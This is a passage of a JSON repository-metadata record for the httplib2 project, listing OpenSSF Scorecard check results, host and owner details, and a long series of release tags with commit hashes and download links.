https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: pipCommand not pinned by hash: script/test:28","Warn: pipCommand not pinned by hash: script/test:36","Warn: pipCommand not pinned by hash: script/test:42","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:112","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:35","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:74","Warn: pipCommand not pinned by hash: .github/workflows/style.yaml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:42","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:44","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:69","Info:   0 out of  16 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of  11 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found","Info: PythonAtherisFuzzer integration found: tests/fuzz_request.py:2","Info: PythonAtherisFuzzer integration found: tests/fuzz_url.py:2"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":9,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Warn: project license file does not contain an FSF or OSI license."],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-79v4-65xg-pq4g"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T13:56:43.862Z","repository_id":5379896,"created_at":"2025-08-19T13:56:43.862Z","updated_at":"2025-08-19T13:56:43.862Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36802710,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-21T02:00:06.756Z","response_time":57,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"httplib2","name":"httplib2","uuid":"17128733","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/17128733?v=4","repositories_count":1,"last_synced_at":"2024-03-25T18:41:02.027Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/httplib2","funding_links":[],"total_stars":482,"followers":7,"following":0,"created_at":"2022-11-02T16:22:04.713Z","updated_at":"2024-03-25T18:41:02.043Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2/repositories"},"tags":[{"name":"v0.32.0","sha":"ba9bf505cd899f522f2bb58ca608444adf49afc1","kind":"commit","published_at":"2026-06-26T10:07:36.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.32.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0/manifests"},{"name":"v0.31.2","sha":"a99a11fba8d5fa3bb9c47827e5cbfd641dfb88d3","kind":"commit","published_at":"2026-01-23T10:59:34.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2/manifests"},{"name":"v0.31.1","sha":"6d2ea322d53a03d058cd8e63c12871cdd1127ca9","kind":"commit","published_at":"2026-01-13T12:08:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1/manifests"},{"name":"v0.31.0","sha":"26cfea5d07a5817cf214d9978c856c91abf4e078","kind":"commit","published_at":"2025-09-11T12:04:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0/manifests"},{"name":"v0.30.2","sha":"d9278ceafb7a05be9998a7a4b1cb7d6d3f689ee5","kind":"commit","published_at":"2025-09-10T17:35:30.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2/manifests"},{"name":"v0.30.1","sha":"6cfe2e6b5aff994f07fa0dcddfacf6d3a7999b1b","kind":"commit","published_at":"2025-09-10T16:57:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"ddfbfd579775027af57121d69f6bd913f01f9471","kind":"commit","published_at":"2025-08-29T17:58:43.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0/manifests"},{"name":"v0.22.0","sha":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7","kind":"commit","published_at":"2023-03-21T22:23:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.22.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"3094c64ee75e13530c62217180bf2a983084257e","kind":"commit","published_at":"2022-10-29T12:27:41.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.21.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0/manifests"},{"name":"v0.20.4","sha":"9d4501760c8ac66326d672ab5c94737d3d690ca4","kind":"commit","published_at":"2022-02-02T23:24:16.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4/manifests"},{"name":"v0.20.3","sha":"b10764a31c28a9f1c4ca5c24ae62422985cd6781","kind":"commit","published_at":"2021-11-19T08:46:31.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3/manifests"},{"name":"v0.20.2","sha":"f4efdff5003aa99799f304540bf139d7e08a92f2","kind":"commit","published_at":"2021-11-02T07:04:35.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2/manifests"},{"name":"v0.20.1","sha":"41804463a5d1d56fd39511e4bcc215cf0ac1e357","kind":"commit","published_at":"2021-10-07T12:57:47.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1/manifests"},{"name":"v0.20.0","sha":"a0d1e28d22ba8df56ef32f01830e12f47f39dccc","kind":"commit","published_at":"2021-10-07T08:50:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0/manifests"},{"name":"v0.19.1","sha":"58e6f66804665884393ebbe83968c0c2c16c9f70","kind":"commit","published_at":"2021-03-30T16:03:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1/manifests"},{"name":"v0.19.0","sha":"81e80d00c2b3cb51de6019cfd28b793184d7699a","kind":"commit","published_at":"2021-02-07T14:49:33.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0/manifests"},{"name":"v0.18.1","sha":"9bf300cdc372938f4237150d5b9b615879eb51a1","kind":"commit","published_at":"2020-05-20T19:56:40.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1/manifests"},{"name":"v0.18.0","sha":"8373177d3a9e4dd9c956f9bded22a5f96a00957b","kind":"commit","published_at":"2020-05-20T12:55:27.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0/manifests"},{"name":"v0.17.4","sha":"9413ffc973a2dc90abf787509ee82238345d5602","kind":"commit","published_at":"2020-05-19T14:28:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4/manifests"},{"name":"v0.17.3","sha":"f5684876ef5e3b57c81f716c08b316fa36684f08","kind":"commit","published_at":"2020-04-22T09:09:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3/manifests"},{"name":"v0.17.2","sha":"067b3f250769e921dc397e28f3aadd0ffa14e17b","kind":"tag","published_at":"2020-04-10T23:24:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2/manifests"},{"name":"v0.17.1","sha":"0d490f692ca5f73cd2caaf9cc5e42e9f7702e453","kind":"tag","published_at":"2020-04-02T18:21:23.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1/manifests"},{"name":"v0.17.0","sha":"67463426cf79af766176b1f318fefefd3d5edc23","kind":"tag","published_at":"2020-01-24T14:12:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"a128b94898068fb9357bb693f134c5d0a2443871","kind":"tag","published_at":"2020-01-15T22:54:53.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.16.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"095494db43abe8ddfd53b3c389baaadbfcae4f12","kind":"tag","published_at":"2019-12-19T14:34:09.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.15.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"761558788d540b9442cd1614570074c61aa0bfca","kind":"tag","published_at":"2019-09-27T04:44:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.14.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0/manifests"},{"name":"v0.13.1","sha":"d498ee35017a9498cff3e9aa9887b95b988e6ca9","kind":"tag","published_at":"2019-07-28T11:28:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1/manifests"},{"name":"v0.13.0","sha":"e92155b85c719405fefe69b045f3bcf55d4fbcc1","kind":"commit","published_at":"2019-06-06T19:40:38.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0/manifests"},{"name":"v0.12.3","sha":"dd741d17b595ef47a12f06f7db823fb85edab603","kind":"commit","published_at":"2019-04-24T05:30:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3/manifests"},{"name":"v0.12.1","sha":"ead7f8038f1cd02a923544c4f3294c1389ad3e03","kind":"commit","published_at":"2019-02-14T16:38:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1/manifests"},{"name":"v0.12.0","sha":"86c3b4ea8614cbbddd86fc556781f2f79cd7c2ac","kind":"commit","published_at":"2018-11-14T04:40:05.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0/manifests"},{"name":"v0.11.3","sha":"70fb0c820d2e8211992b402d34444e4b32a1cb6e","kind":"commit","published_at":"2018-03-30T02:21:39.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3/manifests"},{"name":"v0.11.2","sha":"470bb2a9db658b7f851522051f2b0201a21e8925","kind":"commit","published_at":"2018-03-30T02:09:45.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2/manifests"},{"name":"v0.11.1","sha":"f20cd36c44b75d9206f050304937d5f4d63f5b7a","kind":"commit","published_at":"2018-03-26T17:15:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1/manifests"},{"name":"v0.11.0","sha":"5dee729d87cecab1b6c0d7874a8bbd8d24452849","kind":"commit","published_at":"2018-03-21T18:13:04.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0/manifests"},{"name":"v0.10.3","sha":"1ae16e0e8e868e4b81225631ee37c6555493014b","kind":"commit","published_at":"2017-02-06T17:56:20.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"ef81f9566ee765b8f3d93429e3dfa17341d098e7","kind":"commit","published_at":"2017-02-03T21:09:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"4623377a073e1027a691fe139ba1e851eabf0d49","kind":"commit","published_at":"2017-02-03T19:43:17.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1/manifests"},{"name":"0.9.2","sha":"cf631a73e2f3f43897b65206127ced82382d35f5","kind":"tag","published_at":"2015-09-28T13:53:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.2","dependencies_parsed_at":null,"dependency_job_id":nu